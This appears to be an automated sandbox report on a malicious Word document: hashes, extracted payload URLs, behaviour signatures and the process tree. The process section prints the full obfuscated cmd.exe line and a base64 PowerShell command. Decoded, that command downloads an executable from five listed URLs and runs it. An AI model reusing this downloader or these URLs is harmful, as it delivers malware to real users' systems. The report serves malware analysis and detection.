Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
138s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
27/05/2024, 02:05
General
-
Target
778e36d4666cb974072baed674317ab2_JaffaCakes118.doc
-
Size
77KB
-
MD5
778e36d4666cb974072baed674317ab2
-
SHA1
02a82a2f3e193884c9f2a530ca6b777102939e98
-
SHA256
b310420513b142dbff7001fb48a391591d97ffc1ed7564805c978fe60a971c51
-
SHA512
089d9a5988459062a736e14446d536f46385437da2faffe00e651cfdcaae6b1579b1fcac25b1ffa1040adf955e0bc182e353e746cb4e773c80ba8355b32eda1b
-
SSDEEP
1536:3nptJlmrJpmxlRw99NBq+axRc6MT4I6Dhl93tCX:Zte2dw99fHn8
Malware Config
Extracted
http://tresillosmunoz.com/2HB
http://tonyleme.com.br/8l3XcSKQ
http://sg2i.com/wwG
http://lunacine.com/CQ
http://www.yuanjhua.com/OwUzt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\778e36d4666cb974072baed674317ab2_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\Cmd.exeCmd /V/C"^s^e^t N^Y^GD==A^A^I^AAC^A^gA^A^I^A^AC^Ag^AA^IA^AC^AgAAI^AAC^A^g^AAIAAC^Ag^AAIA^AC^A^9BQf^AsH^AoBwY^A^QH^A^hBw^Y^A^0^H^A^7^A^w^a^AEGA^lBgcA^IG^A7^AQ^d^AIH^A^EB^AJAAC^At^BQ^ZAQHA^J^B^Q^LAUGArB^w^bAY^HAu^B^Q^S^As^D^A^p^AQd^AIH^AEB^A^JAAC^As^Aw^a^AkG^A^H^B^A^J^AgCAlB^Ab^AkGA^G^BAZAEGAvB^A^bA^4^G^A3Bw^b^AQE^A^uA^Q^a^A^0GA^GB^AJAsH^A5^BgcA^Q^HA^7B^QK^A^sG^AW^B^wSAQC^A^gAgb^A^kG^AgA^w^aA^kGAHBAJA^gCA^o^BwY^AE^G^Al^BgcA^8GA^m^Bw^O^AcCAl^BAeAU^G^A^uAwJAsCA1^Bw^QAoH^AkA^wKAcCAcBwJA^sC^A^j^BQaA^w^G^AiB^Qd^A^AH^A^6^Ag^d^A4^GAl^B^AJ^A0^DA^1BgcAQ^E^AkA^wO^AcCA^2^Ag^M^AUD^AnAAIA^0^D^Ag^A^Qd^A^MEA6B^A^JAsD^ApA^wJ^AA^EAnA^A^KA^QHAp^B^AbA^AH^ATB^g^L^AcC^A^0Bg^eAU^FA^3^BwTA^8CAt^Bw^bAMGA^u^A^QYAUHA^o^Bg^a^A4^GA^h^B^QdAkH^AuA^w^dAcHA^3B^wL^A^8C^A6AAc^AQ^H^A0^BAaAAEAR^Bw^Q^A^8C^A^tB^wbA^M^G^AuAQ^Z^A4GA^pB^wY^A^E^G^Au^BQ^d^A^wGAvAw^LAoDAw^BA^d^AQH^Ao^B^A^Q^AcEA^3^B^w^dA8C^At^Bw^bAM^G^A^u^A^QaA^IDAnB^wcA8C^AvAgO^A^A^H^A0^B^AdAg^GA^ABQ^U^A^s^EA^TB^wYAg^FAz^AAbA^gD^AvAgc^AIGA^u^AQbA8G^A^jB^gLAU^GAtBQ^ZA^w^GA5Bgb^A8^G^A^0^BwL^A^8C^A^6^A^AcAQH^A^0BAa^AA^EACB^ASAI^D^Av^A^Qb^A^8^GA^jB^gLAoH^Av^BgbAU^H^A^tBwc^A^8^GA^s^BA^b^A^kGAzBQZA^IH^A0B^w^LA8CA6^AAcA^QHA^0B^A^aAcCA9A^waA^Y^FAL^B^A^J^A^sD^A0B^g^b^AU^G^A^p^B^A^bA^M^E^A^i^B^QZAc^FAu^A^A^dA^U^GA^OBA^IA^QH^Aj^B^Q^ZAoGA^i^Bw^b^A0C^A^3BQ^Z^A^4GA9^AQa^A^0GAGBA^J e- ll^ehsr^e^wop&&^f^or /^L %^O ^in (9^0^5,^-1,0)^do ^s^et ^q0=!^q0!!N^Y^GD:~%^O,1!&&^i^f %^O ^l^e^q ^0 ca^l^l %^q0:^~^4%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABGAG0AaQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABLAFYAawA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAZQBzAGkAbABsAG8AcwBtAHUAbgBvAHoALgBjAG8AbQAvADIASABCAEAAaAB0AHQAcAA6AC8ALwB0AG8AbgB5AGwAZQBtAGUALgBjAG8AbQAuAGIAcgAvADgAbAAzAFgAYwBTAEsAUQBAAGgAdAB0AHAAOgAvAC8AcwBnADIAaQAuAGMAbwBtAC8AdwB3AEcAQABoAHQAdABwADoALwAvAGwAdQBuAGEAYwBpAG4AZQAuAGMAbwBtAC8AQwBRAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHkAdQBhAG4AagBoAHUAYQAuAGMAbwBtAC8ATwB3AFUAegB0ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJAB6AEMAdQAgAD0AIAAnADUAMgA2ACcAOwAkAEQAcgB1AD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAHoAQwB1ACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAawAgAGkAbgAgACQASwBWAGsAKQB7AHQAcgB5AHsAJABGAG0AaQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABHAGkAawAsACAAJABEAHIAdQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABEAHIAdQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
114B
MD5e89f75f918dbdcee28604d4e09dd71d7
SHA1f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA2566dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA5128df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB